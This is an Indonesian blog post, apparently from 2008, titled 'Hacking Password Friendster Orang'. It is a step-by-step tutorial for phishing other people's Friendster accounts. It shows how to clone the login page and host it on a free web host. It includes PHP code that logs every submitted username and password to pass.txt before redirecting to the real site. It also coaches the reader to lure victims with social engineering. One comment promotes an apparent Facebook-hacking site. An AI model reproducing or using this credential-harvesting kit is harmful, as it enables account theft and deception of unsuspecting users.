Hacking Password Friendster Orang

Ini untuk mencegah supaya jangan ada lagi yang nanya cara ngehack FS… :p

Bukannya sok jago atau apalah itu namanya tapi cuman sekedar sharing…(Smoga kali lain bisa cari cara sendiri… )Cara ini masih mempan sampe sekarang (Nov 2008), jadi cepetan dicoba keburu dipatch ma FS, lho… Diambilin dari postingannya RyukuNRem…Thanks much..:D, tapi ada beberapa tambahan dan penjelasan pd poin-poin tertentu. First thing first, kamu harus punya web hosting, terserah, tapi disini akan dijelasin pake ripway. (Yg dah ngerti di lewat aja…)Bikin accountnya gampang&gratis. Trus klik My Files > Create Text File Lanjut……

1. Yang harus dikau lakukan adalah membuka situs FS diSINI Disitu langsung aja klik kanan di sembarang tempat n klik view page source…

2.

Copy semua source code yang ada disitu ke notepad atau wordpad..terserah lah… 3. Lalu cari dengan perintah “Find” (Ctrl+F) dan ketik “Action”…klik Enter, trus Enter lagi. Sehingga dapat tag kayak gini…

<form name=”login_form” method=”post” action=”/login.php”> Hapus tanda garis miring sehingga tag nya menjadi seperti berikut : <form name=”login_form” method=”post” action=”login.php”> 4. Trus, copy semua source code yang dah diedit ke ripway. Subject-nya diisi “Friendster.html”. Klik save 5. Klik Create Text File lagi, buat “login.php” yang source codenya sebagai berikut :

<?php header (’Location: http://www.friendster.com/login.php ‘); $handle = fopen(”pass.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “ “); } fwrite($handle, “ “); fclose($handle); exit; ?> 6. Code diatas dicopas dan disave dengan nama “login.php” 7. Setelah itu, klik Create Text File lagi. berikutnya dengan nama pass.txt dimana pass.txt tersebut berguna untuk menyimpan hasilnya…Nggak usah diisi cuma isi subjectnya “pass.txt” , trus langsung klik save Nah hasil akhir di ripway ntar kayak gini… Nah Fake Login siap digunakan…cara yang gampang tinggal kasih link “Friendster.html” ke korban,

harus pintar2 menggunakan social engineering klu mau menggunakan fake login yg kita buat..bilang aja da FS dengan login baru loh..yah jago2 lah ngerayu..:p Cara lain pake overlay..:) Jadi, siapa aja yang view profilemu akan terdirect ke fake login page yang telah anda buat,

nah nanti dia akan ngisi dah tuh…trus setelah diisi nanti secara otomatis akan masuk ke login.php yg dah kita buat..abis tu, dia baru masuk ke friendster yg sebenarnya dengan username n passwordnya dah kita dapat n bisa dilihat di pass.txt yg dah kita buat..tinggal refresh aja pass.txt nya…keliatan deh tuh username n passwordnya.. Sebenernya bisa disederhanaain singkat banget, tapi biarin lah…:D Akhir kata mohon maaf jika ada kekurangan tapi kalo bisa ditambahin…

Tag:

Satu Tanggapan to “Hacking Password Friendster Orang”

  1. http://piratefacebook.com/ Says:

    Salut, j’aurai voulu savoir si ce site Internet marche pour pirater un compte Facebbok : http://piratefacebook.com/ Merci d’avance Jeje

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s


%d blogger menyukai ini: